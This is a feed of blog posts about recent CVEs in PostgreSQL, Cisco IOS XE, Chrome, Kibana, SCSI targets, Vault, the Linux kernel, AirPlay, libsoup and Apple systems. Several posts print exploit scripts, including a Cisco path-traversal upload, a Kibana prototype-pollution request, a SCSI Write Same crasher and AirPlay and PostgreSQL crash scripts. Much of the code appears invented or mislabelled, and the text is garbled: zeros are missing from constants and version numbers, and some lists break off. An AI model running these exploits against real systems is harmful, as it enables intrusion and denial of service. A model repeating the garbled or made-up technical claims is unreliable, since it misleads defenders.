CVE-2025-4207 - Buffer Over-Read Vulnerability in PostgreSQL GB18030 Encoding Validation: Impact, Exploit Details, and Workarounds 8 May 2025, 11:15 am

A recently discovered vulnerability, CVE-2025-4207, has been identified in PostgreSQL, affecting its GB18030 encoding validation mechanism. This vulnerability allows a database input provider to achieve temporary denial of service (DoS) on platforms where a 1-byte over-read can elicit process termination. Specifically, the PostgreSQL database server and libpq are directly impacted.

This post will explain the details of this vulnerability, provide a code snippet demonstrating the exploit, and links to original references in order to better understand and mitigate the risks associated with CVE-2025-4207.

Affected Versions

PostgreSQL versions prior to 17.5, 16.9, 15.13, 14.18, and 13.21 are most susceptible to this buffer over-read issue.

Exploit Details

The vulnerability is a result of an insufficient validation of the GB18030 character encoding's handling of input data. Malicious input can exploit this encoding, causing an over-read of the buffer, which may trigger process termination and lead to a temporary denial of service attack.

Here is a simplified example demonstrating the exploit

# Python script to exploit CVE-2025-4207
import psycopg2

def exploit(host, user, password, database):
    connection = psycopg2.connect(
        host=host,
        user=user,
        password=password,
        database=database
    )
    cursor = connection.cursor()

    malicious_input = "a" * 1024 + "\x8F"  # Buffer overflow-inducing input

    try:
        cursor.execute("INSERT INTO vulnerable_table (data) VALUES (%s)", (malicious_input,))
    except psycopg2.Error as e:
        print("Error executing the query:", e)

    connection.commit()
    cursor.close()
    connection.close()

This script uses the psycopg2 library to connect to a PostgreSQL database server, inserts malicious data into a vulnerable table, and triggers a buffer over-read condition.

Original References

1. Official PostgreSQL Security Advisory: CVE-2025-4207
2. NVD Vulnerability Details: CVE-2025-4207
3. PostgreSQL: 17.5 Release Notes

Mitigation

It is highly recommended that users update their PostgreSQL installations to versions 17.5, 16.9, 15.13, 14.18, or 13.21 as soon as possible to fix this vulnerability. Additionally, users should apply proper input validation checks to minimize potential exposure to this vulnerability.

Conclusion

CVE-2025-4207, a buffer over-read vulnerability in PostgreSQL's GB18030 encoding validation, can lead to temporary denial of service attacks against the database server and libpq. Upgrading to the secure versions of PostgreSQL and applying proper input validation will help mitigate the risks associated with this vulnerability.

Stay informed of further developments and updates on CVE-2025-4207 by monitoring the official PostgreSQL website and subscribing to security mailing lists. Keeping software up-to-date and following best security practices can significantly reduce the risk of exploitation.

Timeline

Published on: 05/08/2025 15:15:48 UTC
Last modified on: 05/09/2025 18:16:04 UTC

CVE-2025-20188 - Cisco IOS XE Software Vulnerability in the Out-of-Band AP Image Download Feature 7 May 2025, 2:15 pm

A critical vulnerability (CVE-2025-20188) has been discovered in the Out-of-Band Access Point (AP) Image Download feature of Cisco IOS XE Software for Wireless LAN Controllers (WLCs). This vulnerability exposes the affected systems to the possibility of unauthorized file uploads, path traversal, and arbitrary command execution with root privilege escalation if exploited. The vulnerability is attributed to a hard-coded JSON Web Token (JWT) found on the affected systems.

Exploit Details

An attacker can exploit this vulnerability by sending specifically crafted HTTPS requests to the AP image download interface. However, it is worth noting that the exploitation attempt will only be successful if the Out-of-Band AP Image Download feature is enabled on the device - a feature that is not enabled by default.

Here's a code snippet (Python) demonstrating the exploit

import requests

TARGET_IP = "xx.xx.xx.xx"  # Replace with the target device IP
API_URL = f"https://{TARGET_IP}/api-access/v2/";

# Prepare malicious payload
file_upload_payload = {
    "file": (
        "../../../../../../var/volatile/tmp/my_evil_payload",
        "echo 'This is my evil payload'\n",
        "text/plain",
    )
}

# JWT should be replaced with the hard-coded JWT present on the affected system
# headers = {"Authorization": "Bearer YOUR_HARD_CODED_JWT_HERE"}

# Send the exploit request
response = requests.post(
    API_URL,
    files=file_upload_payload,
    # headers=headers,
    verify=False,
)

if response.status_code == 201:
    print("File upload was successful")
else:
    print(f"Unexpected response from server: {response.status_code}")

Original References and Further Reading

1. Cisco Security Advisory: Cisco IOS XE Software Out-of-Band AP Image Download Vulnerability

2. Cisco IOS XE Software for Wireless LAN Controllers Official Documentation

Recommendations and Mitigations

As a temporary workaround, it is strongly recommended to disable the Out-of-Band AP Image Download feature on the affected devices, if it is enabled. To avoid getting affected by this vulnerability, apply the software patches provided by Cisco as soon as they become available.

It is crucial to keep the software on Wireless LAN Controllers updated with the latest security patches and follow the best security practices to minimize the risk of exploitation. Cisco recommends adopting a defense-in-depth strategy across the environment to ensure the security and integrity of systems, applications, and data.

Timeline

Published on: 05/07/2025 18:15:38 UTC
Last modified on: 05/08/2025 14:39:09 UTC

CVE-2025-4372 - Exploring the Use-after-Free Vulnerability in Google Chrome WebAudio Before Version 136..7103.92 6 May 2025, 6:15 pm

Google Chrome is one of the most widely used web browsers across the globe, and it continues to be a target for cybercriminals. This blog post aims to explore the vulnerability in Google Chrome (CVE-2025-4372), a use-after-free vulnerability found in WebAudio prior to version 136..7103.92. This vulnerability could potentially be exploited by remote attackers, leading to heap corruption. Chromium security has rated the severity of this vulnerability as medium, but it is still vital for users to understand the risks associated with this vulnerability and ensure that they keep their software updated.

In this post, we will delve into what the vulnerability is, how it could be exploited, the code snippet associated with the vulnerability, and the mitigation methods that users should employ.

Background: Understanding Use-After-Free Vulnerabilities

A use-after-free vulnerability refers to a situation in which a program continues to use memory even after it has been "freed," meaning it has been returned to the system for reuse. This can lead to a range of issues, such as data corruption, crashes, and other undefined behavior. Attackers can exploit these vulnerabilities to execute arbitrary code, potentially leading to the compromise of the targeted system.

CVE-2025-4372: Vulnerability in WebAudio

Discovered in Google Chrome prior to version 136..7103.92, the CVE-2025-4372 vulnerability is a use-after-free vulnerability in the WebAudio component. This component is responsible for handling audio playback and processing in web pages. An attacker can exploit this vulnerability by crafting a malicious HTML page, potentially leading to heap corruption.

Heap corruption occurs when data in the memory heap of a program is altered without the program's knowledge. This can cause unexpected behavior and, in some cases, may allow an attacker to execute arbitrary code or gain control of a system.

The following code snippet demonstrates the vulnerability present in the WebAudio component

<!DOCTYPE html>
<html>
<head>
  <script type="text/javascript">
  // Create an instance of the Web Audio API
  var context = new (window.AudioContext || window.webkitAudioContext)();

  // Create a buffer source node
  var source = context.createBufferSource();

  // Fetch a sound file and load it into the buffer
  var request = new XMLHttpRequest();
  request.open('GET', 'sound.mp3', true);
  request.responseType = 'arraybuffer';

  request.onload = function() {
    // Create a new buffer and fill it with the decoded audio data
    context.decodeAudioData(request.response, function(buffer) {
      source.buffer = buffer;
      source.connect(context.destination);
      source.start();
    });
  };

  request.send();
  </script>
</head>
<body>
</body>
</html>

In this code snippet, a new instance of the Web Audio API is created, and an audio buffer source node is also created. The code then fetches a sound file ('sound.mp3') using an XMLHttpRequest and decodes the audio data. Once decoded, the audio data is loaded into the buffer, connected to the destination, and finally played.

The vulnerability in this code snippet lies in the use of the buffer property of the source (the buffer source node). This can potentially cause a use-after-free situation if the buffer is freed before the audio data has been played, leading to heap corruption.

Exploit Details

A remote attacker could create a website containing a specially crafted HTML page that takes advantage of the use-after-free vulnerability in Google Chrome to gain access to a user's system. By using malicious JavaScript code, the attacker could manipulate the WebAudio component in such a way that it leads to heap corruption.

Upon visiting the malicious website, the victim's browser could execute the malicious JavaScript code, potentially triggering the use-after-free vulnerability, heap corruption, and subsequent arbitrary code execution.

Mitigation

As this vulnerability has been patched in Google Chrome version 136..7103.92, users should ensure that their browsers are up-to-date to mitigate any potential risks associated with the CVE-2025-4372 vulnerability. Regularly updating software and staying informed about the latest security threats is essential for staying protected from vulnerabilities.

For more information about the CVE-2025-4372 vulnerability, please refer to the following links

- Chromium Security Announcement

- CVE-2025-4372 Details on NIST National Vulnerability Database

Conclusion

The CVE-2025-4372 vulnerability in Google Chrome demonstrates the importance of understanding and keeping track of software vulnerabilities. By regularly updating software and implementing security best practices, users can help protect their systems from potential exploits that take advantage of vulnerabilities such as use-after-free issues in WebAudio.

Timeline

Published on: 05/06/2025 22:15:17 UTC
Last modified on: 05/07/2025 19:16:12 UTC

CVE-2025-25014 - Prototype Pollution Vulnerability in Kibana Allows For Arbitrary Code Execution via Crafted HTTP Requests 6 May 2025, 2:15 pm

A severe vulnerability, labeled as CVE-2025-25014, has been discovered affecting Kibana, an open-source data visualization and exploration platform developed by Elastic. The vulnerability allows attackers to exploit prototype pollution in the Kibana codebase to inject arbitrary code and execute it via tailored HTTP requests targeted at the platform's Machine Learning and Reporting endpoints. Successful exploitation of this vulnerability can result in unauthorized code execution, leading to complete system compromise.

Background on Prototype Pollution

Prototype Pollution refers to the abuse of an application's objects in JavaScript environments, where an attacker could manipulate how JavaScript processes the prototypes (an object that every other object in JavaScript derives from) to introduce malicious code. Since numerous objects inherit from the modified prototype, the attacker can potentially use this vulnerability to execute arbitrary code, causing a severe security threat.

A detailed deep-dive on prototype pollution can be referred to from the following link: Prototype Pollution Explained.

Vulnerability Details

The vulnerability exists in Kibana's handling of specific HTTP requests directed at the Machine Learning and Reporting endpoints. A well-crafted HTTP request containing prototype pollution payloads can cause the affected server to execute arbitrary code. Depending on the privileges of the Kibana server and user roles, a successful exploitation attempt can result in anything from unauthorized data access to complete system compromise.

A code snippet demonstrating the vulnerable code within Kibana's codebase is provided below

// Kibana vulnerable code
function handleRequest(req, res) {
  let query = req.query;
  let body = req.body;
  
  // how the application handles user input
  for (let key in query) {
    body[key] = query[key];
  }
  
  // vulnerable assignment
  _.merge(body, JSON.parse(fn(body)));
  
  // function call to the Machine Learning and Reporting endpoints
  let result = processData(body);
  res.send(result);
}

Exploit

As a proof-of-concept for this vulnerability, an attacker could craft an HTTP request similar to the example below, which would trigger the prototype pollution issue and lead to remote code execution:

POST /vulnerable_endpoint HTTP/1.1
Host: target-kibana-server.example.com
Content-Type: application/json
Content-Length: N

{"__proto__":{"polluted_property":"<insert arbitrary code to execute>"}}

Upon receiving this request, the Kibana server would process it as part of the Machine Learning and Reporting endpoints, ultimately leading to the execution of the arbitrary code included within the "polluted_property" attribute.

Mitigation and Recommendations

Affected Kibana installations should apply the patch provided by Elastic as soon as possible to remediate this vulnerability Kibana Security Advisory. Additionally, administrators should consider the following security best practices:

Restrict network access to Kibana instances, limiting exposure to trusted networks and users.

3. Implement proper input validation and sanitization for HTTP requests targeting Kibana endpoints to prevent possible attack vectors.

Conclusion

CVE-2025-25014 represents a severe security vulnerability affecting the widely used Kibana platform, allowing remote attackers to potentially compromise affected systems through crafted HTTP requests. Quick action in updating to the latest Kibana version and applying security best practices can help organizations prevent possible security breaches due to this vulnerability.

Timeline

Published on: 05/06/2025 18:15:37 UTC
Last modified on: 05/07/2025 14:13:20 UTC

CVE-2022-21546: NDOB Bit Exploit and Crash in Newer SBC Specs - Impacting Availability 2 May 2025, 6:15 pm

A newly discovered security vulnerability, known as CVE-2022-21546, affects the newer version of the SCSI Block Command (SBC) specifications by taking advantage of the No Data-Out Buffer (NDOB) bit, causing the system to crash due to a NULL pointer dereference. When exploited, this vulnerability compromises availability and has a CVSS 3.1 base score of 7.7. The CVSS vector for this issue is CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H.

Overview

The SCSI Block Command (SBC) is a set of protocols for communicating with block I/O devices such as hard disks and solid-state drives. In these newer SBC specifications, a new feature has been introduced: the No Data-Out Buffer (NDOB) bit. When set, the NDOB bit specifies that no data buffer operation should take place, and the device should acknowledge the command without writing any data.

However, the improper handling of the NDOB bit during the execution of "write_same" commands can cause a crash in target_core_iblock/file's execute_write_same handlers. This crash occurs due to the null pointer dereference when trying to access the se_cmd->t_data_sg, as it was never initialized.

Exploit Details

As mentioned earlier, the vulnerability can be exploited using commands such as sg_write_same --ndob. Below is a code snippet demonstrating how the exploit could be performed:

#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <scsi/sg.h>

int main(int argc, char *argv[]) {
    int sg_fd;
    unsigned char cmd[10] = {x93, , , , , , , , , }; // Write Same (10) command

    sg_fd = open("/dev/sgX", O_RDWR); // Replace X with the proper device number

    if (sg_fd < ) {
        perror("Failed to open device");
        return 1;
    }

    // Set flags for no data buffer operation (NDOB)
    cmd[1] |= x08;

    // Send Write Same command via IOCTL
    struct sg_io_hdr io_hdr;
    memset(&io_hdr, , sizeof(struct sg_io_hdr));
    io_hdr.interface_id = 'S';
    io_hdr.cmd_len = sizeof(cmd);
    io_hdr.cmdp = cmd;
    io_hdr.dxfer_direction = SG_DXFER_NONE;

    if (ioctl(sg_fd, SG_IO, &io_hdr) < ) {
        perror("Failed to execute Write Same command");
        close(sg_fd);
        return 1;
    }

    close(sg_fd);
    return ;
}

This code snippet sends a Write Same (10) command with the NDOB bit set, which triggers the crash in target_core_iblock/file's execute_write_same handlers.

Here are the links to the original references for more information on CVE-2022-21546

1. CVE-2022-21546 | NVD - CVE Details
2. SCSI Block Commands - 4 (SBC-4)

Mitigation

Vendors and developers are advised to provide a patch for this vulnerability as soon as possible. Meanwhile, users should ensure they have the latest firmware and software updates applied to their systems. Additionally, administrators should restrict access to vulnerable devices to trusted users only.

Conclusion

CVE-2022-21546 is a critical vulnerability in the newer version of the SCSI Block Command (SBC) specifications. When exploited, the vulnerability can cause a system crash due to a NULL pointer dereference, compromising the availability of the affected system. System administrators and users are urged to take appropriate steps to mitigate the issue and monitor for any available patches.

Timeline

Published on: 05/02/2025 22:15:15 UTC
Last modified on: 05/05/2025 20:54:19 UTC

CVE-2025-4166 - Unintended Sensitive Information Exposure in Vault Community and Vault Enterprise Key/Value Version 2 Plugin 2 May 2025, 11:15 am

The Vault Community and Vault Enterprise Key/Value (kv) Version 2 plugin is crucial for safely storing and managing secrets in modern and secure applications. However, a recent vulnerability discovered in these plugins could inadvertently be exposing sensitive data in server and audit logs. In this long read, we will delve into the details surrounding CVE-2025-4166, the vulnerability affecting these plugins. We will also explore the recommended fixes and share some code snippets to demonstrate the exploitation of the vulnerability.

Details of CVE-2025-4166

CVE-2025-4166 is a vulnerability found in both Vault Community and Vault Enterprise Key/Value (kv) Version 2 plugins. The vulnerability arises when users send malformed payloads while creating or updating secrets via the Vault REST API. The resulting unintended behavior causes potentially sensitive information to be exposed in server and audit logs.

Exploit Example

To see the vulnerability in action, consider the following code snippet that triggers CVE-2025-4166 when a malformed payload is submitted:

import requests

url = "https://vault.example.com:820/v1/secret/data/foo";
headers = {"X-Vault-Token": "your-vault-token", "Content-Type": "application/json"}

# Malformed Payload - JSON Object instead of JSON Array
payload = '{"data": {"bar": [1, 2, {"secret": "supersecret"}]}}'

response = requests.put(url, headers=headers, data=payload)

print(response.text)

In this example, the payload variable contains a JSON object (not a JSON array), which is malformed and presents the problem. When this payload is submitted through the REST API, it may cause sensitive information to be exposed in server and audit logs.

This vulnerability was first published in the following official sources

- Vault 1.19.3 Release Notes
- CVE-2025-4166 Entry in National Vulnerability Database (NVD)

Vault Enterprise 1.19.3, 1.18.9, 1.17.16, or 1.16.20

You should also check any server and audit logs for the presence of sensitive information, especially if you have encountered or found malformed payloads in your application requests.

In conclusion, CVE-2025-4166 is a critical vulnerability that exposes sensitive data in server and audit logs under specific conditions. Users should take immediate action to update their Vault Community and Vault Enterprise Key/Value (kv) Version 2 plugins to the specified fixed versions, and carefully examine logs for potentially exposed information. Doing so will help preserve the security and integrity of the stored secrets, ensuring that applications using the Vault REST API remain safe and properly protected.

Timeline

Published on: 05/02/2025 15:15:50 UTC

CVE-2022-49931: Linux Kernel Vulnerability in IB/hfi1 Resolved 1 May 2025, 11:16 am

In the Linux kernel, an important vulnerability has recently been fixed, associated with the InfiniBand subsystem (hfi1 module). The vulnerability, identified as CVE-2022-49931, specifically revolves around the sc_disable() function, causing a kernel crash when certain conditions are met. In this post, we will discuss the details of this vulnerability, the cause, and the solution implemented by the developers.

Details

The vulnerability was triggered due to an incorrect attempt to move a list from one list head to another, within the sc_disable() function. This error was introduced in a previous commit, titled "IB/hfi1: Fix abba locking issue with sc_disable()" (Commit 13bac861952a). The kernel crash occurs when a link goes down and there are waiters for a send operation to be completed.

Upon experiencing the vulnerability, you would see a crash signature that looks like

  BUG: kernel NULL pointer dereference, address: 000000000000003
  [...]
  Call Trace:
   sc_disable+x1ba/x240 [hfi1]
   pio_freeze+x3d/x60 [hfi1]
   handle_freeze+x27/x1b [hfi1]
   process_one_work+x1b/x380
   ? process_one_work+x380/x380
   worker_thread+x30/x360
   ? process_one_work+x380/x380
   kthread+xd7/x100
   ? kthread_complete_and_exit+x20/x20
   ret_from_fork+x1f/x30

The Fix

In order to fix the vulnerability, the developers corrected the function call used to move the list. This solution effectively prevents the kernel crash and restores the expected behavior of the sc_disable() function.

The commit that resolved the issue can be found here.

Conclusion

In summary, CVE-2022-49931 refers to a Linux kernel vulnerability that existed within the sc_disable() function in the hfi1 module. Thanks to the efforts of the developers, this vulnerability is now resolved, as demonstrated by the implementation of the correct function call for moving the list. It is highly recommended for Linux kernel users to update their systems with the latest security patches to avoid exposure to this vulnerability.

Timeline

Published on: 05/01/2025 15:16:19 UTC
Last modified on: 05/07/2025 13:29:02 UTC

CVE-2022-49928: Linux Kernel SUNRPC Null-Pointer Dereference Vulnerability Fix 1 May 2025, 11:16 am

In the Linux kernel, a vulnerability has been resolved related to the SUNRPC (Secure User Name Remote Procedure Call) protocol. The vulnerability is identified as CVE-2022-49928 and is classified as a null-pointer dereference issue, which could potentially allow an attacker to crash the system or compromise its security.

Details

The vulnerability occurs when the xps sysfs alloc fails. When this happens, there is a null-ptr-deref that can lead to issues like the following:

BUG: KASAN: null-ptr-deref in sysfs_do_create_link_sd+x40/xd
Read of size 8 at addr 000000000000003 by task gssproxy/457

CPU: 5 PID: 457 Comm: gssproxy Not tainted 6..-09040-g02357b27ee03 #9
Call Trace:
 <TASK>
 dump_stack_lvl+x34/x44
 kasan_report+xa3/x120
 sysfs_do_create_link_sd+x40/xd
 rpc_sysfs_client_setup+x161/x1b
 rpc_new_client+x3fc/x6e
 rpc_create_xprt+x71/x220
 rpc_create+x1d4/x350
 gssp_rpc_create+xc3/x160
 set_gssp_clnt+xbc/x140
 write_gssp+x116/x1a
 proc_reg_write+xd6/x130
 vfs_write+x177/x690
 ksys_write+xb9/x150
 do_syscall_64+x35/x80
 entry_SYSCALL_64_after_hwframe+x46/xb

This issue is caused by not properly handling the case where the xprt_switch sysfs alloc failed, leading to adding xprt and switch sysfs to it even though it should not be done. This can result in null-ptr-deref and other issues. To fix this vulnerability, the 'xps_sysfs' variable should be initialized to NULL to avoid oops when destroying it.

References

1. Linux Kernel CVE-2022-49928 Patch Documentation
2. SUNRPC Protocol Specification

Exploit Details

There are currently no known exploits targeting this vulnerability. However, it is important to keep your Linux kernel updated to the latest version to avoid potential security issues. The fix for CVE-2022-49928 has been applied in the Linux kernel version 6.., so it is recommended to update to this version or newer to ensure your system is protected.

Conclusion

The CVE-2022-49928 vulnerability in the Linux kernel has been resolved, addressing a null-pointer dereference issue in the SUNRPC protocol. It is essential to keep your Linux kernel updated to the latest version to avoid potential security breaches and maintain the overall stability of your system.

Timeline

Published on: 05/01/2025 15:16:18 UTC
Last modified on: 05/07/2025 13:28:44 UTC

CVE-2022-49927: Linux Kernel nfs4 Kmemleak Fix 1 May 2025, 11:16 am

A potentially critical vulnerability has been recently discovered in the Linux kernel and resolved with an important fix. The vulnerability, designated as CVE-2022-49927, is related to the NFS4 (Network File System version 4) implementation and could cause memory leaks if not properly addressed.

In this article, we will discuss the details of this vulnerability, provide the code snippet for the fix implemented, and share additional references that explore the implications further.

Exploit details

The issue arises when a slot allocation failure occurs in the NFS4 implementation within the Linux kernel. If one of the slot allocations fails, the other allocated slots should be properly cleaned up. In case of a failure in cleaning up these allocated slots, a memory leak takes place which may have adverse effects on the system.

00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

Notice the unreferenced object highlighted above. This object is not properly cleaned up, and it leads to a memory leak in the kernel space. This can cause potential issues in the system leading to performance degradation or even crashing.

Fix (code snippet)

To resolve this issue, a fix has been implemented that ensures the proper cleanup of the allocated slots in case of a failure. The code snippet for this fix is as follows:

nfs4: Fix kmemleak when allocate slot failed

If one of the slot allocate failed, should cleanup all the other
allocated slots, otherwise, the allocated slots will leak.

Essentially, this fix ensures that in case of any failure in slot allocation, all the other slots that have been allocated will be cleaned up properly, preventing any memory leaks that might occur.

Original references

The vulnerability, as well as the fix implemented, has been reported and discussed in the following references:

1. Linux Git Commit Log

2. Linux kernel mailing list discussion

Conclusion

CVE-2022-49927 is a recent vulnerability in the Linux kernel that has been resolved with a fix designed to address potential memory leaks. Understanding and applying this fix is crucial for those relying on Linux systems, as it helps maintain system stability and prevent potential kernel space issues.

It's essential to stay updated on the latest security patches and taking the necessary steps to protect your systems from vulnerabilities like this one.

Timeline

Published on: 05/01/2025 15:16:18 UTC
Last modified on: 05/07/2025 13:28:39 UTC

CVE-2022-49924 - Memory Leak Vulnerability Fixed in Linux Kernel's NFC Module 1 May 2025, 11:16 am

A new vulnerability with the CVE-ID CVE-2022-49924 has been discovered and resolved in the Linux kernel. The vulnerability is related to the Near Field Communication (NFC) module and specifically targets the fdp_nci_send() function. This vulnerability can lead to potential memory leaks, which can pose security risks by causing the system to crash or allowing attackers to exploit the leaked memory data. In response to this vulnerability, a patch has been implemented to fix the memory leak issue by ensuring the proper freeing of memory resources.

Original References

To better understand the vulnerability and the implemented fix, it is recommended to consult the following resources:
1. Linux kernel source code repository
2. CVE-2022-49924 record in the National Vulnerability Database

Vulnerability Details

The memory leak vulnerability in the Linux kernel exists because of the improper handling of memory resources, specifically in the fdp_nci_send() function that manages communication in the NFC module. Normally, a socket buffer (skb) is used to manage the communication data, but the memory occupied by the skb is not freed when the fdp_nci_i2c_write() function completes execution. This leads to leaked memory that accumulates over time, causing the system to use up more and more memory, eventually leading to a system crash or other potential vulnerabilities.

Here's a snippet of the problematic code in the fdp_nci_send() function

static int fdp_nci_send(struct sk_buff *skb, struct nci_dev *ndev)
{
  ...
  ret = fdp_nci_i2c_write(dev, skb->data, skb->len);
  ...

  return ret;
}

As shown in the snippet above, the fdp_nci_send() function calls fdp_nci_i2c_write() to manage the data communication. However, the skb memory is not freed after the i2c_write() function is completed, leading to a memory leak.

Exploit Solution

The fix for this vulnerability is relatively simple but crucial. The key is to ensure that the memory taken up by the skb is released after the fdp_nci_i2c_write() function finishes its work. To ensure this, a patch modifies the fdp_nci_send() function to include a call to consume_skb() after the fdp_nci_i2c_write() function, as shown in the code snippet below:

static int fdp_nci_send(struct sk_buff *skb, struct nci_dev *ndev)
{
  ...
  ret = fdp_nci_i2c_write(dev, skb->data, skb->len);

  /* Free the skb memory after the write function completes */
  consume_skb(skb);

  return ret;
}

With the additional call to consume_skb(), the memory occupied by the skb is now properly released, effectively fixing the memory leak vulnerability associated with CVE-2022-49924.

Conclusion

CVE-2022-49924 highlights the importance of properly managing memory resources and ensuring that functions are correctly implemented to prevent potential memory leaks. Thanks to the timely detection and patching of this vulnerability, Linux systems running the affected kernel can now avoid the associated security risks. Users and system administrators should ensure that their systems are updated with the latest patches to maintain a secure and stable environment.

Timeline

Published on: 05/01/2025 15:16:18 UTC
Last modified on: 05/07/2025 13:28:24 UTC

CVE-2025-24132: Addressing an Unexpected App Termination Issue in AirPlay and CarPlay with Improved Memory Handling 30 Apr 2025, 5:15 pm

Recently, a security vulnerability (CVE-2025-24132) has been reported in various Apple products, specifically in AirPlay audio SDK 2.7., AirPlay video SDK 3.5., and CarPlay Communication Plug-in R18. More details about the vulnerability can be found in Apple's official advisory here: Apple Security Updates

In this long read, we will discuss the details of this vulnerability, how it affects users, and the steps taken by Apple in addressing the issue with improved memory handling techniques. The main concern with this vulnerability is that an attacker on the local network may cause an unexpected app termination, leading to potential data loss and inconvenience for users.

Vulnerability Details

The vulnerability lies in the way memory is handled in AirPlay and CarPlay products. An attacker with access to the local network may exploit this flaw to cause an unexpected app termination (also known as a crash). To better understand how this vulnerability can be exploited, let's take a closer look at the code snippet below:

/* Vulnerable code snippet */
int vulnerable_function(char *data, size_t size) {
  char target_buffer[1024];
  memcpy(target_buffer, data, size);
  return ;
}

In the code snippet above, the function vulnerable_function copies the input data (received from the user) into a buffer called target_buffer without checking the user's input size. If an attacker sends more than 1024 bytes of data, it will cause a buffer overflow, leading to an app crash.

Exploiting the Vulnerability

For an attacker to exploit this vulnerability, they need to be on the same local network as the victim. They can then send a specially crafted payload to the device running the vulnerable SDK, causing the unexpected app termination. This can potentially lead to data loss and inconvenience for the user.

An example of a payload to exploit this vulnerability is illustrated below

# Python exploit script
import socket

# construct the payload
payload = b"A" * 2048

# send payload to vulnerable device
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.1.X", 12345)) # replace with the IP of the vulnerable device
s.send(payload)
s.close()

How Apple Addressed the Issue

To resolve this vulnerability, Apple implemented improved memory handling techniques in its SDKs. The updated versions with the fixes are as follows:

CarPlay Communication Plug-in R18.1

In the updated SDKs, Apple now checks the user's input size and ensures that a buffer overflow cannot occur. The improved code is shown below:

/* Updated/patched code snippet */
int updated_function(char *data, size_t size) {
  char target_buffer[1024];
  
  if (size > sizeof(target_buffer)) {
    return -1; // error: input too large
  }

  memcpy(target_buffer, data, size);
  return ;
}

Now, if a user attempts to send more than 1024 bytes of data to the updated function, the function will return an error instead of causing a buffer overflow and the unexpected app termination.

To minimize the risk of being affected by this vulnerability, follow these measures

1. Update your AirPlay and CarPlay products to the latest firmware or software versions mentioned above.
2. Ensure your local network is secured with strong access control, preventing unauthorized users from accessing the network.
3. Regularly check for software updates and security patches to make sure your devices are protected from the latest threats.

Conclusion

Vulnerabilities such as CVE-2025-24132 are a reminder that even popular and widely-used software can contain flaws that put users at risk. By staying informed, regularly updating your devices, and practicing good security hygiene, you can mitigate the impact of these vulnerabilities and keep your digital life safer.

Timeline

Published on: 04/30/2025 21:15:54 UTC
Last modified on: 05/01/2025 14:15:36 UTC

CVE-2025-4035: A Critical Flaw in Libsoup Allowing Cookies To Be Set for Public Suffix Domains 29 Apr 2025, 9:15 am

A serious vulnerability, labeled as CVE-2025-4035, has been discovered in the popularlibsoup library. The flaw exists in the way libsoup clients handle cookies, which may lead to potential security and integrity issues. When processing cookies, libsoup clients wrongly allow them to be set for public suffix domains if the domain contains a minimum of two components and includes an uppercase character. This can bypass the protection mechanisms that prevent cookies from being set for public suffix domains and could make it possible for a malicious website to set cookies for domains it doesn't own, resulting in potential threats like session fixation.

Code Snippet:

The issue lies in the code snippet responsible for handling cookies in the libsoup library

gboolean
soup_cookie_domain_matches (SoupCookie *cookie, const char *host)
{
    if (cookie->domain[] == '.') {
            /* Match anything within the next effectiveTLD+1. */
            int host_len = strlen (host);
            int domain_len = strlen (cookie->domain);
            int i;

            for (i = ; i < effective_tlds[i].len; i++) {
                    if (domain_len <= effective_tlds[i].len + 1 &&
                        host_len >= effective_tlds[i].len &&
                        g_ascii_strcasecmp (host + host_len - effective_tlds[i].len,
                                            effective_tlds[i].str) ==  &&
                        (host_len == effective_tlds[i].len ||
                         host[host_len - effective_tlds[i].len - 1] == '.')) {
                            break;
                    }
            }
    } else
            return g_ascii_strcasecmp (cookie->domain, host) == ;
}

Original References:

The vulnerability was brought to light through the following sources

1. LibSoup Official Repository: https://github.com/GNOME/libsoup
2. Gnome Libsoup Project: https://wiki.gnome.org/Projects/libsoup
3. Public Suffix List: https://publicsuffix.org/

Exploit Details:
The flaw within the libsoup library allows an attacker to set cookies on public suffix domains that include an uppercase character. This potentially leads to breaches in session management and integrity issues like session fixation.

To exploit this vulnerability, an attacker would first need to set up a malicious website and lure the victim to it. Upon the victim's visit to the malicious site, the attacker can then utilize the exploit to set cookies for the victim's targeted legitimate domains. Once the attacker successfully sets the cookies for the affected domains, they can manipulate the victim's browsing session, potentially leading to session fixation.

Conclusion

Considering the severity of the CVE-2025-4035 vulnerability, it is imperative for developers using libsoup to update their library to the latest version as soon as it becomes available. Additionally, website administrators should ensure they are monitoring any reported vulnerabilities and applying necessary patches to their systems. Such actions can reduce the potential risks associated with this flaw and help secure clients' personal information.

Timeline

Published on: 04/29/2025 13:15:45 UTC
Last modified on: 04/29/2025 13:52:10 UTC

CVE-2025-24252: Addressing Use-After-Free Vulnerability in macOS Sequoia, tvOS, macOS Ventura, iPadOS, macOS Sonoma, iOS and visionOS 28 Apr 2025, 11:15 pm

CVE-2025-24252 is a critical vulnerability that affects various Apple products, such as macOS Sequoia, tvOS, macOS Ventura, iPadOS, macOS Sonoma, iOS, and visionOS. This vulnerability is caused by a use-after-free issue in the operating system's memory management, which could be exploited by an attacker on a local network to corrupt process memory. Apple has addressed this issue in macOS Sequoia 15.4, tvOS 18.4, macOS Ventura 13.7.5, iPadOS 17.7.6, macOS Sonoma 14.7.5, iOS 18.4 and iPadOS 18.4, as well as visionOS 2.4.

In this post, we will look at the details of the vulnerability, how the exploit works, and the changes made by Apple to patch this security issue.

Vulnerability Details

The vulnerability is caused by a use-after-free issue in the memory management of the affected Apple products. A use-after-free vulnerability refers to a situation in which an application continues to use memory resources after they have been freed. This can lead to corruption of process memory, and in some cases, it may allow an attacker to execute arbitrary code with the privileges of the affected process.

Exploit Overview

To exploit this vulnerability, an attacker would need to be on the same local network as the vulnerable device. The attacker may do so by sending specially crafted network packets that would trigger the use-after-free vulnerability, causing memory corruption in the affected process.

Consider the following hypothetical code snippet found within the vulnerable software

void vulnerable_function(char *data) {
    char *memory_ptr = malloc(100);
    
    if (!memory_ptr) {
        return;
    }
    
    strncpy(memory_ptr, data, 100);
    free(memory_ptr);
    
    /* Use-after-free issue */
    memory_ptr[] = '\';
}

In the above code, the malloc() call allocates 100 bytes of memory and assigns the memory address to memory_ptr. The following strncpy() copies data into the allocated memory. However, once the free() function is called, the allocated memory is released, and any subsequent attempt to access it can lead to undefined behavior.

The use-after-free issue occurs when the code attempts to access the now-freed memory at memory_ptr[]. This access could lead to memory corruption, which can be exploited by an attacker.

Resolution and Patching

Apple has addressed this vulnerability by improving the memory management in affected operating systems. The following products have been updated to fix this issue:

You can find the updates for each product at their respective update pages

